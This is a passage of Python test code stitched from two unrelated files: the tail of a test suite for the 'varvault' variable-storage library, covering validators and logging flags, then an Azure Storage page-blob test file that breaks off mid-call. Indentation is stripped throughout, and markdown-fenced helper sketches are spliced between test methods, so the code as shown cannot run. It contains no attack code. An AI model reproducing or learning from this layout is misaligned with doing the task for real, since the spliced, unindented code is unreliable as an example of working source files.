            logger.info(f"Expected error received; test passed: {e}")
        try:
            @varvault.validator()
            def invalid_decorator_use(value, this_arg_must_not_exist):
                pass
            pytest.fail("Managed to register a validator function that should not be possible to register. Managed to register a validator function with more than 1 positional arg called 'keyvalue'")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")
        try:
            @varvault.validator(function_asserts=True)
            def invalid_decorator_use(value):
                pass
            pytest.fail("Managed to register a validator function that should not be possible to register. The function needs to contain an 'assert' call in the source if 'function_asserts' is set to True")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")
        try:
            @varvault.validator(function_returns_bool=True)
            def invalid_decorator_use(value) -> bool:
                pass
            pytest.fail("Managed to register a validator function that should not be possible to register. The function needs to return something in the source if 'function_returns_bool' is set to True")
        except Exception as e:
            logger.info(f"Expected error received; test passed: {e}")

        @varvault.validator(function_asserts=True, skip_source_assertions=True)
        def valid_decorator_use_1(value):
            pass

        @varvault.validator(function_returns_bool=True, skip_source_assertions=True)
        def valid_decorator_use_2(value) -> bool:
            pass
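The registration-time checks exercised above (mutually exclusive flags, exactly one positional argument for the key's value) can be approximated with `inspect.signature` alone. This is a hedged sketch of the idea, not varvault's actual decorator; the source-scanning checks for `assert`/`return` are deliberately left out here since they require access to the function's source text:

```python
import inspect


def validator_sketch(function_asserts=False, function_returns_bool=False):
    """Decorator factory that sanity-checks a validator at registration time.

    An illustrative stand-in for varvault.validator: it enforces the
    mutually-exclusive flags and the single-positional-arg rule, then tags
    the function with its declared mode for later use.
    """
    if function_asserts and function_returns_bool:
        # Matches the first failing case in the test above.
        raise SyntaxError("'function_asserts' and 'function_returns_bool' are mutually exclusive")

    def register(func):
        positional = [p for p in inspect.signature(func).parameters.values()
                      if p.kind in (p.POSITIONAL_ONLY, p.POSITIONAL_OR_KEYWORD)]
        if len(positional) != 1:
            raise ValueError("validator must accept exactly one positional arg (the key's value)")
        func.function_asserts = function_asserts
        func.function_returns_bool = function_returns_bool
        return func
    return register
```

Attaching the flags as attributes lets the caller later decide whether to interpret a `False` return or an `AssertionError` as a validation failure.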
def test_key_validation_function(self):
# This will validate the function and assign some attributes to it that varvault will use when validating the value for the key
@varvault.validator(function_returns_bool=True)
def must_be_even(value: int) -> bool:
return (value % 2) == 0
@varvault.validator(function_asserts=True)
def cannot_be_negative(value: int):
assert value >= 0
@varvault.validator()
def no_dashes(value: str):
assert "-" not in value
class KeyringKeyValidationFunction(varvault.Keyring):
int_must_be_even_number = varvault.Key("int_must_be_even_number", valid_type=int, validators=(must_be_even, cannot_be_negative))
no_dashes_in_str = varvault.Key("no_dashes_in_str", valid_type=str, validators=no_dashes)
vault = varvault.create_vault(KeyringKeyValidationFunction, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
try:
vault.insert(KeyringKeyValidationFunction.int_must_be_even_number, 1)
pytest.fail(f"Managed to set {KeyringKeyValidationFunction.int_must_be_even_number} to an uneven number via {vault.insert.__name__}. This should not be possible.")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
@vault.vaulter(return_keys=KeyringKeyValidationFunction.int_must_be_even_number)
def set_failed():
return 5
try:
set_failed()
pytest.fail(f"Managed to set {KeyringKeyValidationFunction.int_must_be_even_number} to an uneven number via {vault.vaulter.__name__}. This should not be possible")
except Exception as e:
logger.info(f"Expected error received; test passed: {e}")
vault.insert(KeyringKeyValidationFunction.int_must_be_even_number, 2)
assert KeyringKeyValidationFunction.int_must_be_even_number in vault and vault.get(KeyringKeyValidationFunction.int_must_be_even_number) == 2
@vault.vaulter(varvault.VaultFlags.permit_modifications(), return_keys=KeyringKeyValidationFunction.int_must_be_even_number)
def _set_modified():
return 4
_set_modified()
assert KeyringKeyValidationFunction.int_must_be_even_number in vault and vault.get(KeyringKeyValidationFunction.int_must_be_even_number) == 4
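# The insert/vaulter failures above come from the key's validators running
# before a value is accepted. The core of that flow, sketched generically
# (run_validators is hypothetical, not a varvault API):

```python
def must_be_even(value):
    # Bool-returning validator: False signals rejection.
    return (value % 2) == 0


def cannot_be_negative(value):
    # Assert-based validator: raises AssertionError on rejection.
    assert value >= 0


def run_validators(value, validators):
    """Run every validator; reject on a False return or a raised assertion."""
    for validator in validators:
        if validator(value) is False:
            raise ValueError(f"{validator.__name__} rejected value {value!r}")
    return value
```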
def test_add_minivault_function(self):
vault = varvault.create_vault(Keyring, "vault", varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault.vaulter(return_keys=(Keyring.key_valid_type_is_str, Keyring.key_valid_type_is_int))
def insert():
mv = varvault.MiniVault()
mv.add(Keyring.key_valid_type_is_str, "valid")
mv.add(Keyring.key_valid_type_is_int, 1)
return mv
insert()
assert Keyring.key_valid_type_is_str in vault and vault.get(Keyring.key_valid_type_is_str) == "valid"
assert Keyring.key_valid_type_is_int in vault and vault.get(Keyring.key_valid_type_is_int) == 1
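# test_add_minivault_function returns several keyed values from one function
# via a small mapping object. The idea in isolation (MiniVaultSketch is a
# stand-in, not varvault's actual MiniVault):

```python
class MiniVaultSketch(dict):
    """Dict-like container pairing keys with values for a bulk insert."""

    def add(self, key, value):
        self[key] = value


def produce():
    mv = MiniVaultSketch()
    mv.add("key_valid_type_is_str", "valid")
    mv.add("key_valid_type_is_int", 1)
    return mv
```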
class TestLogging:
@classmethod
def setup_class(cls):
tempfile.tempdir = "/tmp" if sys.platform == "darwin" or sys.platform == "linux" else tempfile.gettempdir()
def setup_method(self):
try:
os.remove(vault_file_new)
except OSError:
pass
try:
os.remove(vault_file_new_secondary)
except OSError:
pass
def test_silent(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.silent(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) <= 2, f"There appear to be more lines in the log file than there should be. " \
f"There should be at most 2. {varvault.VaultFlags.silent()} appears to not function correctly"
assert len(open(vault_log_file).readlines()) <= 2, f"There appear to be more lines in the log file than there should be. " \
f"There should be at most 2. {varvault.VaultFlags.silent()} appears to not function correctly"
def test_debug(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
# Create and set a file to act as a StreamHandler for the logger object in varvault.
# This way, we can easily capture stdout to a file and assert that the output is the expected
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) >= 10, f"There appear to be fewer lines in the log file than there should be. " \
f"There should be at least 10. {varvault.VaultFlags.debug()} appears to not function correctly"
assert len(open(vault_log_file).readlines()) >= 12, f"There appear to be fewer lines in the log file than there should be. " \
f"There should be at least 12. {varvault.VaultFlags.debug()} appears to not function correctly"
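# The tests above count log lines by pointing a StreamHandler at a file.
# That capture technique on its own (the logger name and helper are
# illustrative, unrelated to varvault internals):

```python
import logging
import tempfile


def count_logged_lines(messages):
    """Log each message through a file-backed StreamHandler; return the line count."""
    log = logging.getLogger("capture-sketch")
    log.setLevel(logging.INFO)
    with tempfile.NamedTemporaryFile("w+", suffix=".log", delete=False) as f:
        handler = logging.StreamHandler(f)
        log.addHandler(handler)
        try:
            for msg in messages:
                log.info(msg)
            handler.flush()
            f.seek(0)
            return len(f.readlines())
        finally:
            log.removeHandler(handler)
```

Each record is written with the handler's newline terminator, so the line count equals the number of emitted records.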
def test_silent_and_debug(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
# Create and set a file to act as a StreamHandler for the logger object in varvault.
# This way, we can easily capture stdout to a file and assert that the output is the expected
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) == 0, f"The log file does not contain the expected number of lines. " \
f"There should be exactly 0. {varvault.VaultFlags.debug()} with {varvault.VaultFlags.silent()} appears to not function correctly"
assert len(open(vault_log_file).readlines()) == 12, f"The log file does not contain the expected number of lines. " \
f"There should be exactly 12. {varvault.VaultFlags.debug()} with {varvault.VaultFlags.silent()} appears to not function correctly"
def test_disable_logger(self):
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
try:
os.unlink(vault_log_file)
except OSError:
pass
assert not os.path.exists(vault_log_file), f"{vault_log_file} still exists; it should have been removed"
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.disable_logger(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
assert vault_new.logger is None, "logger object is not None; it should be"
assert not os.path.exists(vault_log_file), f"{vault_log_file} exists after creating the vault when saying there shouldn't be a logger object"
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert not os.path.exists(vault_log_file), f"{vault_log_file} exists after using the vault. How?!"
def test_remove_existing_log_file(self):
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _doset():
return "valid"
_doset()
with open(vault_log_file) as f1:
assert len(f1.readlines()) == 12, "There should be exactly 12 lines in the log file."
vault_from = varvault.from_vault(Keyring, "vault", vault_file_new, varvault.FileTypes.JSON, varvault.VaultFlags.remove_existing_log_file())
assert Keyring.key_valid_type_is_str in vault_from
with open(vault_log_file) as f2:
assert len(f2.readlines()) == 3, "There should be exactly 3 lines in the log file. It seems the log file wasn't removed when the new vault was created from the existing vault."
def test_specific_logger(self):
old_handlers = logger.handlers.copy()
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "pytest-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "pytest-file.log")
try:
os.unlink(temp_log_file)
except OSError:
pass
try:
os.unlink(vault_log_file)
except OSError:
pass
try:
logger.handlers.clear()
logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
logger.addHandler(logging.FileHandler(filename=vault_log_file))
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON, varvault_specific_logger=logger)
assert vault_new.logger.name == "pytest"  # The logger used by these tests is named "pytest"
@vault_new.vaulter(varvault.VaultFlags.silent(), return_keys=Keyring.key_valid_type_is_str)
def _set():
return "valid"
_set()
assert len(open(temp_log_file).readlines()) == 1, "The log file does not contain the expected number of lines. There should be exactly 1."
assert len(open(vault_log_file).readlines()) == 11, "The log file does not contain the expected number of lines. There should be exactly 11."
finally:
logger.handlers.clear()
logger.handlers = old_handlers
def test_no_error_logging(self):
temp_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault-stream.log")
vault_log_file = os.path.join(tempfile.gettempdir(), "varvault-logs", "varvault-vault.log")
vault_new = varvault.create_vault(Keyring, "vault", varvault.VaultFlags.debug(), varvault_vault_filename_to=vault_file_new, varvault_filehandler_class=varvault.FileTypes.JSON)
# Create and set a file to act as a StreamHandler for the logger object in varvault.
# This way, we can easily capture stdout to a file and assert that the output is the expected
vault_new.logger.addHandler(logging.StreamHandler(open(temp_log_file, "w")))
@vault_new.vaulter(varvault.VaultFlags.no_error_logging(), return_keys=Keyring.key_valid_type_is_str)
def _set():
raise Exception("Failing deliberately")
try:
_set()
except Exception:
pass
assert len(open(temp_log_file).readlines()) == 3, f"The log file does not contain the expected number of lines. " \
f"There should be exactly 3. It appears that {varvault.VaultFlags.no_error_logging()} doesn't work properly"
assert len(open(vault_log_file).readlines()) == 5, f"The log file does not contain the expected number of lines. " \
f"There should be exactly 5. It appears that {varvault.VaultFlags.no_error_logging()} doesn't work properly"
# coding: utf-8
# tests/blob/test_page_blob.py (from Ross1503/azure-storage-python)
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import os
import unittest
from datetime import datetime, timedelta
from azure.common import AzureHttpError
from azure.storage.blob import BlobPermissions, Blob, PageBlobService, SequenceNumberAction
from azure.storage.blob.models import PremiumPageBlobTier
from azure.storage.common._common_conversion import _get_content_md5
from tests.testcase import (
StorageTestCase,
TestMode,
record,
)
# ------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'blob'
FILE_PATH = 'blob_input.temp.dat'
LARGE_BLOB_SIZE = 64 * 1024 + 512
EIGHT_TB = 8 * 1024 * 1024 * 1024 * 1024
SOURCE_BLOB_SIZE = 8 * 1024
# ------------------------------------------------------------------------------
class StoragePageBlobTest(StorageTestCase):
def setUp(self):
super(StoragePageBlobTest, self).setUp()
self.bs = self._create_storage_service(PageBlobService, self.settings)
self.container_name = self.get_resource_name('utcontainer')
# create source blob to be copied from
self.source_blob_name = self.get_resource_name('srcblob')
self.source_blob_data = self.get_random_bytes(SOURCE_BLOB_SIZE)
if not self.is_playback():
self.bs.create_container(self.container_name)
self.bs.create_blob(self.container_name, self.source_blob_name, SOURCE_BLOB_SIZE)
self.bs.create_blob_from_bytes(self.container_name, self.source_blob_name, self.source_blob_data)
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
self.bs.MAX_PAGE_SIZE = 4 * 1024
# generate a SAS so that it is accessible with a URL
sas_token = self.bs.generate_blob_shared_access_signature(
self.container_name,
self.source_blob_name,
permission=BlobPermissions.READ,
expiry=datetime.utcnow() + timedelta(hours=1),
)
self.source_blob_url = self.bs.make_blob_url(self.container_name, self.source_blob_name, sas_token=sas_token)
def tearDown(self):
if not self.is_playback():
try:
self.bs.delete_container(self.container_name)
except Exception:
pass
if os.path.isfile(FILE_PATH):
try:
os.remove(FILE_PATH)
except OSError:
pass
return super(StoragePageBlobTest, self).tearDown()
# --Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
def _create_blob(self, length=512):
blob_name = self._get_blob_reference()
self.bs.create_blob(self.container_name, blob_name, length)
return blob_name
def assertBlobEqual(self, container_name, blob_name, expected_data):
actual_data = self.bs.get_blob_to_bytes(container_name, blob_name)
self.assertEqual(actual_data.content, expected_data)
def assertRangeEqual(self, container_name, blob_name, expected_data, start_range, end_range):
actual_data = self.bs.get_blob_to_bytes(container_name, blob_name, None, start_range, end_range)
self.assertEqual(actual_data.content, expected_data)
def _wait_for_async_copy(self, container_name, blob_name):
count = 0
blob = self.bs.get_blob_properties(container_name, blob_name)
while blob.properties.copy.status != 'success':
count += 1
if count > 5:
self.fail('Timed out waiting for async copy to complete.')
self.sleep(5)
blob = self.bs.get_blob_properties(container_name, blob_name)
self.assertEqual(blob.properties.copy.status, 'success')
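# _wait_for_async_copy is a bounded poll. The same shape as a reusable
# helper (poll_until is illustrative, not part of the Azure SDK):

```python
import time


def poll_until(check, attempts=5, interval=0.01):
    """Call check() until it returns truthy or the attempts run out."""
    for _ in range(attempts):
        if check():
            return True
        time.sleep(interval)
    raise TimeoutError(f"condition not met after {attempts} attempts")
```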
class NonSeekableFile(object):
def __init__(self, wrapped_file):
self.wrapped_file = wrapped_file
def write(self, data):
self.wrapped_file.write(data)
def read(self, count):
return self.wrapped_file.read(count)
# --Test cases for page blobs --------------------------------------------
@record
def test_create_blob(self):
# Arrange
blob_name = self._get_blob_reference()
# Act
resp = self.bs.create_blob(self.container_name, blob_name, 1024)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertTrue(self.bs.exists(self.container_name, blob_name))
@record
def test_create_blob_with_metadata(self):
# Arrange
blob_name = self._get_blob_reference()
metadata = {'hello': 'world', 'number': '42'}
# Act
resp = self.bs.create_blob(self.container_name, blob_name, 512, metadata=metadata)
# Assert
md = self.bs.get_blob_metadata(self.container_name, blob_name)
self.assertDictEqual(md, metadata)
@record
def test_put_page_with_lease_id(self):
# Arrange
blob_name = self._create_blob()
lease_id = self.bs.acquire_blob_lease(self.container_name, blob_name)
# Act
data = self.get_random_bytes(512)
self.bs.update_page(self.container_name, blob_name, data, 0, 511, lease_id=lease_id)
# Assert
blob = self.bs.get_blob_to_bytes(self.container_name, blob_name, lease_id=lease_id)
self.assertEqual(blob.content, data)
@record
def test_update_page(self):
# Arrange
blob_name = self._create_blob()
# Act
data = self.get_random_bytes(512)
resp = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
self.assertBlobEqual(self.container_name, blob_name, data)
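# Page blob writes must cover whole 512-byte pages, which is why the ranges
# above run from 0 to 511. That alignment rule as a small local check (the
# helper name is illustrative, not an SDK function):

```python
PAGE_SIZE = 512


def is_valid_page_range(start, end):
    """A page range must begin on a page boundary and end on a page's last byte."""
    return (
        0 <= start <= end
        and start % PAGE_SIZE == 0
        and (end + 1) % PAGE_SIZE == 0
    )
```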
@record
def test_create_8tb_blob(self):
# Arrange
blob_name = self._get_blob_reference()
# Act
resp = self.bs.create_blob(self.container_name, blob_name, EIGHT_TB)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsInstance(blob, Blob)
self.assertEqual(blob.properties.content_length, EIGHT_TB)
self.assertEqual(0, len(ranges))
@record
def test_create_larger_than_8tb_blob_fail(self):
# Arrange
blob_name = self._get_blob_reference()
# Act
with self.assertRaises(AzureHttpError):
self.bs.create_blob(self.container_name, blob_name, EIGHT_TB + 1)
@record
def test_update_8tb_blob_page(self):
# Arrange
blob_name = self._get_blob_reference()
self.bs.create_blob(self.container_name, blob_name, EIGHT_TB)
# Act
data = self.get_random_bytes(512)
start_range = EIGHT_TB - 512
end_range = EIGHT_TB - 1
resp = self.bs.update_page(self.container_name, blob_name, data, start_range, end_range)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
self.assertRangeEqual(self.container_name, blob_name, data, start_range, end_range)
self.assertEqual(blob.properties.content_length, EIGHT_TB)
self.assertEqual(1, len(ranges))
self.assertEqual(ranges[0].start, start_range)
self.assertEqual(ranges[0].end, end_range)
@record
def test_update_page_with_md5(self):
# Arrange
blob_name = self._create_blob()
# Act
data = self.get_random_bytes(512)
resp = self.bs.update_page(self.container_name, blob_name, data, 0, 511,
validate_content=True)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
@record
def test_clear_page(self):
# Arrange
blob_name = self._create_blob()
# Act
resp = self.bs.clear_page(self.container_name, blob_name, 0, 511)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
self.assertBlobEqual(self.container_name, blob_name, b'\x00' * 512)
@record
def test_put_page_if_sequence_number_lt_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lt=start_sequence + 1)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_lt_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lt=start_sequence)
# Assert
@record
def test_update_page_if_sequence_number_lte_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lte=start_sequence)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_lte_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lte=start_sequence - 1)
# Assert
@record
def test_update_page_if_sequence_number_eq_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_eq=start_sequence)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_eq_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512,
sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_eq=start_sequence - 1)
# Assert
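# The if_sequence_number_{lt,lte,eq} tests above exercise service-side
# preconditions. Their pure comparison logic, modeled locally (the helper
# is illustrative, not an SDK function):

```python
def sequence_number_allows(current, lt=None, lte=None, eq=None):
    """Mirror the page-blob sequence-number preconditions as plain comparisons."""
    if lt is not None and not current < lt:
        return False
    if lte is not None and not current <= lte:
        return False
    if eq is not None and current != eq:
        return False
    return True
```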
@record
def test_update_page_unicode(self):
# Arrange
blob_name = self._create_blob()
# Act
data = u'abcdefghijklmnop' * 32
with self.assertRaises(TypeError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Assert
@record
def test_update_page_from_url(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0, end_range=4 * 1024 - 1,
copy_source_url=self.source_blob_url, source_range_start=0)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=4 * 1024,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=4 * 1024)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
@record
def test_update_page_from_url_and_validate_content_md5(self):
# Arrange
src_md5 = _get_content_md5(self.source_blob_data)
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls with correct md5
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_content_md5=src_md5)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with wrong md5
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_content_md5=_get_content_md5(b"POTATO"))
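# source_content_md5 above carries a Content-MD5 value: the base64-encoded
# raw MD5 digest of the data. _get_content_md5 can be approximated with the
# standard library (a sketch, not the SDK helper itself):

```python
import base64
import hashlib


def content_md5(data: bytes) -> str:
    """Base64-encode the raw MD5 digest, as used for HTTP Content-MD5."""
    return base64.b64encode(hashlib.md5(data).digest()).decode("utf-8")
```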
@record
def test_update_page_from_url_with_source_if_modified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
source_if_modified_since=resource_properties.last_modified - timedelta(
hours=15))
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
source_if_modified_since=resource_properties.last_modified)
@record
def test_update_page_from_url_with_source_if_unmodified(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
resource_properties = self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
source_if_unmodified_since=resource_properties.last_modified)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0,
if_unmodified_since=resource_properties.last_modified - timedelta(
hours=15))
@record
def test_update_page_from_url_with_source_if_match(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
src_blob_resource_properties = self.bs.get_blob_properties(self.container_name,
self.source_blob_name).properties
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_match=src_blob_resource_properties.etag)
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_match='0x111111111111111')
@record
def test_update_page_from_url_with_source_if_none_match(self):
# Arrange
dest_blob_name = self.get_resource_name('destblob')
self.bs.create_blob(self.container_name, dest_blob_name, SOURCE_BLOB_SIZE)
src_blob_resource_properties = self.bs.get_blob_properties(self.container_name,
self.source_blob_name).properties
# Act part 1: make update page from url calls
resp = self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
end_range=SOURCE_BLOB_SIZE - 1, copy_source_url=self.source_blob_url,
source_range_start=0, source_if_none_match='0x111111111111111')
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
# Assert the destination blob is constructed correctly
blob = self.bs.get_blob_properties(self.container_name, dest_blob_name)
self.assertBlobEqual(self.container_name, dest_blob_name, self.source_blob_data)
self.assertEqual(blob.properties.etag, resp.etag)
self.assertEqual(blob.properties.last_modified, resp.last_modified)
# Act part 2: put block from url with failing condition
with self.assertRaises(AzureHttpError):
self.bs.update_page_from_url(self.container_name, dest_blob_name, start_range=0,
